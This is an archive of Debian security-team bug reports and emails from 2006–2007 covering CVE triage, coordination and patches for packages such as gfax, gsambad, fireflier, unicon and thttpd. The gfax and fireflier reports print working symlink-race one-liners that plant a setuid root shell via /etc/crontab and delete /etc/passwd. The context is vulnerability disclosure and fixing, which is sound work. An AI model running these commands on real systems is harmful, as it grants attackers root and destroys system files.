On Fri Jul 20, 2007 at 11:02:07 +0200, Pierre Habouzit wrote: attached is the patch that fixes it. I'm going to NMU lighttpd in unstable, please someone takes care of etch. Joey if you could allocate a DOS CVE ID I'll do the upload, I've already done lighttpd patches for etch. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#432924: [CVE-2007-3641, CVE-2007-3644, CVE-2007-3645] various security bugs
On Fri Jul 13, 2007 at 08:16:07 -0500, John Goerzen wrote: I will upload a fix to unstable shortly. However, it sounds like this could also impact the version in stable, so CCing [EMAIL PROTECTED] Yes that looks to be the case. If you had a patch that would apply to the version in Stable that would be appreciated. I applied the FreeBSd patch but that failed more than it succeeded .. I'll have a few hours tomorrow to look at it, so don't worry too much if you can't supply it. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype
On Mon Jul 09, 2007 at 17:43:47 -0700, Steve Langasek wrote: Ok, uploading. sigh -- please kick this one out, I just noticed I built it with stable-security as the target. I'd be happy to do that if you, or somebody else, could tell me how to do so.. Let me know if you would like me to re-roll -7 or prepare a -8 instead. I think we need a -8 if the -7 has been seen, right? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype
On Mon Jul 09, 2007 at 12:43:57 -0700, Steve Langasek wrote: I've uploaded a freetype 2.1.7-7 package to http://people.debian.org/~vorlon/freetype/, signed and built for sarge. Thanks. Let me know if you would like me to upload this to security.d.o (I promise I'll even use the embargoed queue this time, so you don't have to go hunting for the upload ;). That'd be grand, thanks. Unfortunately, going back through my mail I see that there's another open security report against freetype, bug #426771. I have not investigated this at all to confirm which versions of freetype are affected. Please advise if you would like me to look into this for possible inclusion in 2.1.7-7. :( I think that for the moment it would be best to push this out so that we're all on a level playing field. (Which reminds me some of the slower buildds have started catching up too..) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431893: CVE-2007-2839: Trivial local-root attack
Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security
*** Please type your report below this line ***
The gfax package as released in Sarge, make unsafe use of temporary files
which allow local users to gain root trivially.
Etch, Lenny, and Sid are unaffected.
The following code is in src/mgetty_setup.c:
/* if it's NULL then nuke the faxrunq crontab entry. */
if ((fin = fopen(/etc/crontab, r)) == NULL) {
do_message(_(\nCan't open /etc/crontab\n));
return;
}
if ((fout = fopen(/tmp/crontab, w)) == NULL) {
do_message(_(\nCan't create /tmp/crontab\n));
return;
}
while (fgets(buf, 128, fin) != NULL) {
fputs(buf, fout);
fclose(fout);
fclose(fin);
/* now copy the new file back to /etc */
if ((fin = fopen(/tmp/crontab, r)) == NULL) {
do_message(_(\nCan't open /tmp/crontab\n));
return;
}
if ((fout = fopen(/etc/crontab, w)) == NULL) {
do_message(_(\nCan't create /etc/crontab\n));
return;
}
while ((c = fgetc(fin)) != EOF)
fputc(c, fout);
fclose(fout);
fclose(fin);
remove(/tmp/crontab);
This can be abused to write arbitary commands to the /etc/crontab file.
If /tmp/crontab exists already, owned by a non-root user then it will
be truncated and trashed. However the ownership will still remain that
of the non-root user - so a race condition between the first copy
and the second copy can allow arbitary line(s) to be appended to /etc/crontab.
The following exploits this easily:
[EMAIL PROTECTED]:~$ while true; do echo */1 * * * * root /bin/cp /bin/sh /tmp
chmod 4755 /tmp/sh /tmp/crontab; done
When root runs the setup program things end up like this:
[EMAIL PROTECTED]:~$ ls -l /etc/crontab
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab
[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp chmod 4755 /tmp/sh
[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh
Steve
--
http://www.steve.org.uk/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)
This is fixed in DSA-1329-1. Just reported here for reference. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated
Package: gsambad
Version: 0.1.5-5
Severity: grave
Usertags: sourcescan
*** Please type your report below this line ***
Security issue: CVE-2007-2838
The gsambad package contains a binary (which may only be
executed by the root user) with the following code in it:
if((fp=popen(touch /tmp/gsambadtmp chmod 600 /tmp/gsambadtmp
smbstatus 21 /tmp/gsambadtmp, w))==NULL)
{
/* Dont show a popup */
return;
}
This can be used to create/trash arbitary files upon the system with
a symlink attack.
Steve
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431332: CVE-2007-2837: Arbitary file removal
Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan
*** Please type your report below this line ***
Security issue: CVE-2007-2837.
The server, fireflierd, runs with root privileges and the code
contains this gem which I think speaks for itself:
string getRule(unsigned int chainid, int rulenum)
{
...
cmd=rm -f /tmp/fireflier.rules touch /tmp/fireflier.rules
chmod 0700 /tmp/fireflier.rules ;
cmd+=IPTABLES_SAVE;
cmd+= /tmp/fireflier.rules;
if(DEBUG)
coutcmd: cmdendl;
system(cmd.c_str());
...
}
This contains several race conditions, and can be trivially exploited to
remove any file on the server as root.
For example run this as a user inside GNU screen:
[EMAIL PROTECTED]:~$ while true; do ln -s /etc/passwd
/tmp/fireflier.rules; done
Wait for a root user to fetch/update/delete a rule using one of the available
clients, and the /etc/passwd file will be removed.
Steve
--
# Kink-Friendly Dating
http://ctrl-alt-date.com/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431336: CVE-2007-2835 : Buffer overflow.
Package: unicon-imc2
Version: 3.0.4-11
Severity: grave
Usertags: sourcescan
*** Please type your report below this line ***
CVE-2007-2835 : Allows local root compromise via zhcon.
Anyway, the setuid(0) zhcon application links to this library,
which contains a buffer overflow which may be used to gain root.
(Actually any application using this library can be exploited;
this is the only setuid one I could spot.)
The source of this problem is ./unicon/ImmModules/cce/CCE_pinyin.c:
static int
IMM_Flush ()
{
char name[256];
sprintf(name,%s/.pyinput/usrphrase.tab,getenv(HOME));
SaveUsrPhrase(name);
sprintf(name,%s/.pyinput/sysfrequency.tab,getenv(HOME));
SavePhraseFrequency(name);
return 1;
}
There are similar problems in the file /unicon/ImmModules/cce/xl_pinyin.c
too.
Steve
--
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated
On Sun Jul 01, 2007 at 20:54:24 +0200, Daniel Baumann wrote:
I assume that the 0.1.4-2etch1 upload a few minutes ago was a security
upload of yours, hence I'll wait until this appears and upload then a
fixed package to sid.
yes that is correct.
If you're happy to upload soon that would be great. I'll attach the
patch I used.
Steve
--
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/
diff -u gsambad-0.1.4/config.sub gsambad-0.1.4/config.sub
--- gsambad-0.1.4/config.sub
+++ gsambad-0.1.4/config.sub
@@ -4,7 +4,7 @@
# 2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation,
# Inc.
-timestamp='2006-09-20'
+timestamp='2006-07-02'
# This file is (in principle) common to ALL GNU software.
# The presence of a machine in this file suggests that SOME GNU software
@@ -276,7 +276,6 @@
| pdp10 | pdp11 | pj | pjl \
| powerpc | powerpc64 | powerpc64le | powerpcle | ppcbe \
| pyramid \
- | score \
| sh | sh[1234] | sh[24]a | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \
| sh64 | sh64le \
| sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \
@@ -285,7 +284,7 @@
| tahoe | thumb | tic4x | tic80 | tron \
| v850 | v850e \
| we32k \
- | x86 | xc16x | xscale | xscalee[bl] | xstormy16 | xtensa \
+ | x86 | xscale | xscalee[bl] | xstormy16 | xtensa \
| z8k)
basic_machine=$basic_machine-unknown
;;
@@ -368,7 +367,7 @@
| tron-* \
| v850-* | v850e-* | vax-* \
| we32k-* \
- | x86-* | x86_64-* | xc16x-* | xps100-* | xscale-* | xscalee[bl]-* \
+ | x86-* | x86_64-* | xps100-* | xscale-* | xscalee[bl]-* \
| xstormy16-* | xtensa-* \
| ymp-* \
| z8k-*)
@@ -910,10 +909,6 @@
sb1el)
basic_machine=mipsisa64sb1el-unknown
;;
- sde)
- basic_machine=mipsisa32-sde
- os=-elf
- ;;
sei)
basic_machine=mips-sei
os=-seiux
@@ -1371,9 +1366,6 @@
# system, and we'll never get to this point.
case $basic_machine in
-score-*)
- os=-elf
- ;;
spu-*)
os=-elf
;;
diff -u gsambad-0.1.4/debian/changelog gsambad-0.1.4/debian/changelog
--- gsambad-0.1.4/debian/changelog
+++ gsambad-0.1.4/debian/changelog
@@ -1,4 +1,12 @@
-gsambad (0.1.4-2) unstable; urgency=medium
+gsambad (0.1.4-2etch1) stable-security; urgency=high
+
+ * Non-maintainer upload by The Security Team.
+ * Avoid unsafe usage of temporary files.
+[CVE-2007-2838]
+
+ -- Steve Kemp [EMAIL PROTECTED] Thu, 28 Jun 2007 16:47:39 +
+
+gsambad (0.1.4-2) unstable; urgency=medium
* Adjusting the icondir.
* Makeing use of su-to-root in the desktop file.
only in patch2:
unchanged:
--- gsambad-0.1.4.orig/src/populate_conns.c
+++ gsambad-0.1.4/src/populate_conns.c
@@ -48,7 +48,8 @@
long file_size=0, old_pos=0;
gchar *combined=NULL;
gchar *utf8=NULL;
-
+char command_buffer[1024];
+char * filename;
gtk_list_store_clear(widgets-conns_store);
/* This attempt to show useful output is probably quite
@@ -64,20 +65,37 @@
fflush(stdin);
fflush(stdout);
-/* Write the output of smbstatus to a tempfile, FIXME: Static paths and generally notgoodtoday */
-if((fp=popen(touch /tmp/gsambadtmp chmod 600 /tmp/gsambadtmp smbstatus 21 /tmp/gsambadtmp, w))==NULL)
+/* make a secure temporary file */
+filename = tempnam( /tmp, p_c.c );
+
+/* Write the output of smbstatus to a tempfile. */
+snprintf( command_buffer, sizeof(command_buffer) - 1,
+ touch %s chmod 600 %s smbstatus 21 %s,
+ filename, filename, filename );
+
+if((fp=popen(command_buffer, w))==NULL)
{
+/* free memory */
+free( filename );
+
/* Dont show a popup */
return;
}
pclose(fp);
/* We want it in a tempfile so we can scroll around in it properly */
-if((fp=fopen(/tmp/gsambadtmp, r))==NULL) // FIXME: Static paths
+if((fp=fopen(filename, r))==NULL) // FIXME: Static paths
{
+/* free memory */
+free( filename );
+
/* Dont show a popup */
return;
}
+
+/* free memory */
+free( filename );
+
fseek(fp, 0, SEEK_END);
file_size = ftell(fp);
rewind(fp);
Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated
On Sun Jul 01, 2007 at 21:47:42 +0200, Daniel Baumann wrote: uploaded 0.1.6-2 with your patch and urgency=high, so you probably want to mention this version for testing/sid in the DSA. Great. no offence intended, but i'd be happy if you can next time attach the patch to the bug report right from the beginning. None taken. That was a genuine mistake, I honestly thought I'd copied you into my initial report with the problem. I usually do that so that maintainers aren't caught on the hop. I'll be much more careful to make sure I do that next time. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431336: Patch
Patch we used for the DSA.
diff -u unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
@@ -159,9 +159,9 @@
IMM_Flush ()
{
char name[256];
- sprintf(name,%s/.pyinput/usrphrase.tab,getenv(HOME));
+ snprintf(name,sizeof(name)-1,%s/.pyinput/usrphrase.tab,getenv(HOME));
SaveUsrPhrase(name);
- sprintf(name,%s/.pyinput/sysfrequency.tab,getenv(HOME));
+ snprintf(name,sizeof(name)-1,%s/.pyinput/sysfrequency.tab,getenv(HOME));
SavePhraseFrequency(name);
return 1;
diff -u unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
@@ -138,21 +138,21 @@
//Rat: modified for processing user-defined dictionaries
if ((usrhome = getenv (HOME)) != NULL)
{
- sprintf (buf, %s/%s, usrhome, .pyinput);
+ snprintf (buf,sizeof(buf)-1, %s/%s, usrhome, .pyinput);
retval = stat (buf, statbuf);
if ((retval == 0))
{
if ((statbuf.st_mode S_IFMT) == S_IFDIR)
{
- sprintf (buf, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s/%s, usrhome, .pyinput,
usrphrase.tab);
if ( (retval = stat(buf, statbuf)) == 0)
{
if ( statbuf.st_size MIN_USRPHR_SIZE || LoadUsrPhrase (buf)
== -1)
{
printf (Couldn't load %s. Please fix it. size or load
error\n, buf);
- sprintf (buf, %s/%s, szPath,
usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s,
szPath, usrphrase.tab);
if ((retval = access (buf, R_OK)) == 0)
{
if (LoadUsrPhrase (buf) == -1)
@@ -164,7 +164,7 @@
else
{
creat (buf, 0600);
- sprintf (buf, %s/%s, szPath, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, szPath,
usrphrase.tab);
if ((retval = access (buf, R_OK)) == 0)
{
if (LoadUsrPhrase (buf) == -1)
@@ -181,10 +181,10 @@
else
{
mkdir (buf, 0700);//Rat: making $HOME/.pyinput
- sprintf (buf, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s/%s, usrhome, .pyinput,
usrphrase.tab);
creat (buf, 0600);//Rat: making $HOME/.pyinput/usrphrase.tab
- sprintf (buf, %s/%s, szPath, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, szPath, usrphrase.tab);
if ((retval = access (buf, R_OK)) == 0)
{
if (LoadUsrPhrase (buf) == -1)
@@ -197,7 +197,7 @@
else
{
printf (Sorry, I couldn't find your $HOME.\n);
- sprintf (buf, %s/%s, szPath, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, szPath, usrphrase.tab);
printf (Turn to access %s, buf);
if ((retval = access (buf, R_OK)) != 0)
@@ -210,7 +210,7 @@
}
- sprintf(buf,%s/%s/%s,usrhome,.pyinput,sysfrequency.tab);
+ snprintf(buf,sizeof(buf)-1,%s/%s/%s,usrhome,.pyinput,sysfrequency.tab);
if(LoadPhraseFrequency(buf) == -1)
{
creat(buf,0700);
@@ -229,7 +229,7 @@
AdjustPhraseFreq (); // lower the freq to [0,50)
if (usrhome != NULL)
{
- sprintf (szFileName, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+ snprintf (szFileName, sizeof(szFileName)-1, %s/%s/%s, usrhome,
.pyinput, usrphrase.tab);
SaveUsrPhrase (szFileName);
}
else
diff -u unicon-3.0.4/debian/changelog unicon-3.0.4/debian/changelog
--- unicon-3.0.4/debian/changelog
+++ unicon-3.0.4/debian/changelog
@@ -1,3 +1,11 @@
+unicon (3.0.4-11etch1) stable-security; urgency=high
+
+ * Non-maintainer upload by The Security Team.
+ * Fix the unsafe use of environmental variables.
+[CVE-2007-2835]
+
+ -- Steve Kemp [EMAIL PROTECTED] Sun, 24 Jul 2007 15:02:42 +
+
unicon (3.0.4-11) unstable; urgency=low
* Changed TLS_PthSocket ::read ::write to Read, Write.
Steve
--
http://www.steve.org.uk/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#431332: CVE-2007-2837: Arbitary file removal
On Sun Jul 01, 2007 at 21:56:43 +0200, Martin MAURER wrote: I agree that this code could become a problem, although I wasn't able to reproduce using screen and the command written in your mail. I could reproduce this using the -qt version of the client. First of all adding some rules, then bringing up the rule list and removing one of them. Anyways - what really might happen is that the file is overwritten, not deleted, as rm should delete the link not the file the link points to. That is generally true. I'm trying to remember whether it was unlinked and I'm 99% certain it was, rather than truncated/trashed. Nevertheless, this doesnt make a big difference, so I will add your fix to the official version of fireflier. Thanks a lot. Steve -- # Commercial Debian GNU/Linux Support http://www.linux-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#430691: [EMAIL PROTECTED]
On Wed Jun 27, 2007 at 11:29:12 +0900, Taku YASUI wrote: I'll upload new upstream version to sid soon. And I attach the patch to fix this problem. Great, thanks. If you could tell us which version in Sid would fix the problem I can include that in the advisory. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#430691: hiki: [security] vulnerability that arbitrary files would be deleted
Hiki 0.8.0 - 0.8.6 is affected, it means that stable, testing and unstable pacakges in Debian are affected. Please update hiki package. For more detail, see http://hikiwiki.org/en/advisory20070624.html Joey if you could allocate an ID I'll upload a fixed package. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#430012: CVE-2006-4168: Integer overflow vulnerability fixed in 0.6.16
On Thu Jun 21, 2007 at 20:16:41 +0200, Stefan Fritsch wrote: CVE-2006-4168: Integer overflow in the exif_data_load_data_entry function in libexif/exif-data.c in Libexif before 0.6.16 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via an image with many EXIF components, which triggers a heap-based buffer overflow. This is fixed in 0.6.16, see http://sourceforge.net/project/shownotes.php?release_id=515385 This was already fixed, for Sarge + Etch: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00070.html http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00071.html Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#424690: CVE-2007-1673: denial of service (infinite loop) in zoo and unzoo
I see no copy of the vulnerable code in the Debian version of unzoo, I suspect this is only an issue for the non-free version of unzoo, which we'll not release an update for. Comments? Steve -- # Commercial Debian GNU/Linux Support http://www.linux-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#429218: [CVE-2007-3125] format string issue in X.509 certificate processing
Fixed already in Stable (etch): w3m (0.5.1-5.1) unstable; urgency=high * NMU by the Security Team: * Fix format string vulnerability in display of SSL certificates. (No CVE ID yet) (Closes: #404564) -- Moritz Muehlenhoff [EMAIL PROTECTED] Tue, 26 Dec 2006 18:49:26 +0100 Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#429191: flyspray phpmailer: not relevant for stable
On Sun Jun 17, 2007 at 18:20:01 +0200, Thijs Kinkhorst wrote: For stable I've checked whether it's vulnerable and I believe it's not: the vulnerability is in the SendmailSend() function. That requires for the calling code to actually use the sendmail method, which Flyspray does not allow in any configuration. I suppose the security team does not send advisories for insecure code that is not called? Agreed. As an additional note: sarge is not vulnerable because it doesn't contain a copy of the phpmailer class at all. :) So we don't need to do anything, perfect! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype
On Wed May 30, 2007 at 06:19:29 -0700, Steve Langasek wrote: Signed package for etch is on its way up to http://people.debian.org/~vorlon/freetype/ right now (built with -sa, so should indeed be ready for upload straight to security-master). Thanks a lot, Steve. Let me know if there's anything else you need from me for etch. Looks good, thanks. I'll upload tomorrow with an aim of getting it released on Friday. I haven't yet looked into whether this bug affects the sarge version of the package, I'll do that next (unless somebody here already knows the answer). I was under the impression that it wasn't vulnerable, but I admit I've not yet checked. If we've not heard back by the time I make the upload I'll take a look myself. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype
On Sun May 27, 2007 at 12:47:58 +0200, Moritz Muehlenhoff wrote: I guess we should fix this, it's indirectly remotely exploitable at least by providing someone a malformed TTF font file. As libfreetype is an important infrastructure library there might also be unforeseen indirect attack vectors, like embedding TTFs in other document types, etc. Agreed. Steve Kemp wanted to work on a DSA, so you should probably check back with him before preparing an upload. I was planning on handling this yes, so if there were a fixed package available for Etch then I'd appreciate seeing it. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#404233: CVE-2006-6678: Netrik arbitrary command execution
On Fri, Dec 22, 2006 at 06:42:41PM +0100, Stefan Fritsch wrote:
A vulnerability has been reported in Netrik:
Thanks for the report. Security update for Sarge is building now.
Patch attached:
Steve
--
--- form-file.c 2003-08-06 10:28:45.0 +
+++ /home/skx/form-file.c 2006-12-22 22:19:12.0 +
@@ -10,6 +10,7 @@
* (C) 2003 antrik
*/
+#include ctype.h
#include sys/stat.h
#include fcntl.h
#include stdio.h
@@ -107,6 +108,14 @@
char temp_name[size];
snprintf(temp_name, size, format, name);
+ /* make sure we get a proper filename */
+ {
+char *chr;
+for(chr=temp_name; *chr; ++chr)
+ if(!isalnum(*chr))/* not safe filename char - replace */
+ *chr='_';
+ }
+
/* write temporary file */
{
intfildes;
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#398936: libapache2-mod-ifier: The module breaks POST processing
Package: libapache2-mod-ifier Version: 0.8-2 Severity: grave Justification: renders package unusable This module, when installed and enabled, breaks all processing of POST requests. It should be removed from Etch until it can be updated to work correctly. -- System Information: Debian Release: 4.0 APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-1-486 Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Versions of packages libapache2-mod-ifier depends on: ii apache2.2-common 2.2.3-3.1 Next generation, scalable, extenda ii libc62.3.6.ds1-8 GNU C Library: Shared libraries libapache2-mod-ifier recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#396277: allows creating any file as root
On Mon, Oct 30, 2006 at 10:56:28PM +0100, Marco d'Itri wrote: By creating a /tmp/start_thttpd symlink a local attacker will be able to create/touch any file as root. Thanks for the report. Once I get a CVE identifier allocated I'll handle an update for Sarge. Daniel if you have a preferred patch that would be appreciated, otherwise I'll come up with a solution and add it to this bug. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#396277: allows creating any file as root
Daniel Please find attached the patch I'm going to use for the security update. Could you please apply it, or a comparable patch to the version in unstable and let us know which version will fix the problem? Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit [EMAIL PROTECTED]:/tmp$ interdiff thttpd_2.23beta1-3sarge1.diff thttpd_2.23beta1-3sarge2.diff diff -u thttpd-2.23beta1/debian/changelog thttpd-2.23beta1/debian/changelog --- thttpd-2.23beta1/debian/changelog +++ thttpd-2.23beta1/debian/changelog @@ -1,3 +1,11 @@ +thttpd (2.23beta1-3sarge2) stable-security; urgency=high + + * Non-maintainer upload by the Security Team. + * Fix the insecure use of temporary files when invoked by logrotate. +[CVE-2006-4248] + + -- Steve Kemp [EMAIL PROTECTED] Tue, 31 Oct 2006 17:49:34 + + thttpd (2.23beta1-3sarge1) stable-security; urgency=high * Non-maintainer upload by the Security Team diff -u thttpd-2.23beta1/debian/thttpd.logrotate thttpd-2.23beta1/debian/thttpd.logrotate --- thttpd-2.23beta1/debian/thttpd.logrotate +++ thttpd-2.23beta1/debian/thttpd.logrotate @@ -4,15 +4,9 @@ compress missingok delaycompress -prerotate - if pidof thttpd 21 /dev/null; then - touch /tmp/start_thttpd - fi -endscript postrotate - if [ -f /tmp/start_thttpd ]; then +if [ -f /var/run/thttpd.pid ]; then /etc/init.d/thttpd restart 21 /dev/null - rm -f /tmp/start_thttpd fi endscript } signature.asc Description: Digital signature
Bug#394637: gaim-encryption plugin does not load
On Sun, Oct 22, 2006 at 01:08:18PM +0200, Jan Strnad wrote: Package: gaim-encryption Version: 3.0~beta5-3 Severity: critical Tags: security Justification: root security hole This doesn't appear to have any security implications. Certainly not a root hole. Sure you could argue that not having encryption is a security issue; but installing this package will not cause your machine to become vulnerable in any realistic fashion. Please re-classify accordingly. Steve -- signature.asc Description: Digital signature
Bug#381376: Status of CVE-2006-3918 #381376
On Sat, Sep 09, 2006 at 01:22:25PM +0200, Stefan Fritsch wrote: On Saturday 09 September 2006 12:35, Lo?c Minier wrote: I think only apache was uploaded for CVE-2006-3918, and not apache2. Do you intend to issue a DSA for apache2 as well? Or isn't it affected by the vulnerability? This is fixed in apache2 = 2.0.55-4.1 in unstable. The issue is less severe for apache2 because it is much more difficult to exploit: apache2 will first wait for the request timeout (usually 5 minutes) before sending the problematic error message. I have a pending upload of Apache2 for this, but I've been unexpectantly busy. I did intend it to be a day or two after the apache update. All being well I'll get it released tomorrow. If not it will have to be midweek. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#380182: Confirmed
A security advisory is pending. This bug applies to both the apache and apache2 packages. Same fix in both packages, but in different locations... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#380231: [CVE-2006-3747] Off-by-one flaw exists in the Rewrite module, mod_rewrite
On Fri, Jul 28, 2006 at 05:06:38PM +0200, Daniel Leidert wrote: The latest release notes [1] of apache 1.3.37, 2.0.59 and 2.2.3 contains a note, about an off-by-one flaw (CVE-2006-3747 [2]). [1] http://www.apache.org/dist/httpd/Announcement2.2.html [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747 Please check, if the Debian package(s) is/are vulnerable. apache + apache2 packages are affected. DSA in preparation. Thanks for the report. (Please see also #380182) Steve -- signature.asc Description: Digital signature
Bug#379174: Shadow security update for CVE-2006-3378
On Sun, Jul 23, 2006 at 06:16:00PM +0200, Christian Perrier wrote: Hello dear Security team (and ftpmasters, and shadow package maintainers), Being back from 2 days holiday I discover CVE-2006-3378 which has just been revealed to our attention (#359174 in the BTS). I guess you mean #379174 here? What I propose to you, as soon as we have a fix for CVE-2006-3378: -urgently destroy 4.0.3-31sarge6 and 31sarge7 from the proposed-updates queue. Need ftpmasters collaboration with high urgency -the security team, or the shadow package team, prepares 4.0.3-31sarge6 with the fix for CVE-2006-3378 *ALONE* -the shadow package team prepares 4.0.3-31sarge7 with BOTH updates and sends it to the proposed-updates queue so that it can be picked by the SRM team when they're ready to update sarge Sounds fine from the security point of view. Once a patch is available at least. Steve -- signature.asc Description: Digital signature
Bug#379347: xen-tools: xen-create image fails at xt-create-image
On Sun, Jul 23, 2006 at 12:42:28AM +, Henning Sprang wrote: Package: xen-tools Version: 2.1-3 Severity: grave Justification: renders package unusable Grave seems a little extreme since the package clearly works for some. However I'm happy to leave it there for a day or two at least until I can update documentation to be better. when running xen-create-image --size=5Gb --swap=1024Mb --dhcp --lvm=virtualmachines --hostname=fasel --kernel=/boot/vmlinuz-2.6.16-xen --initrd=/boot/initrd-2.6.16-xen.img --force It looks like you're missing an installation method. Please add: --dist=sarge --debootstrap This might be all you need. It isn't clear whether you've modified the global configuration file /etc/xen-tools/xen-tools.conf, I will assume you haven't since if you had you could have setup the various options that you've specified there. --- start message --- Creating ext3 filesystem on /dev/virtualmachines/fasel-disk Done Installing your system with Running command '/usr/bin/xt-install-image --location=/tmp/MqrYmFUWft --dist=sarge --cache=yes /dev/null 2/dev/null' failed. --- end message --- This means it made the filesystems, etc, but failed to install with debootstrap/rpmstrap/copy/tar. That could be because you didn't specify one of those options, or it might be bacuse one was specified in the configuration file but failed for some reason. I can't really tell just yet. Unfortunately, this message doesn't give any hint what could be done better, and trying to run the given command to try to get more information doesn't help, because the temporary diretory is removed already. Indeed the temporary directory has been removed, but you can create it and mount the previously created image from /dev/virtualmachines/fase1-disk if you do wish to explore. No idea how this package should be used. It seems you do have a reasonable idea, it is just unfortunate that this invocation didn't proceed correctly. Running man xen-create-image might have been useful since it does cover the usage of the different installation methods, and the specification of the distribution you wish to install .. I'd 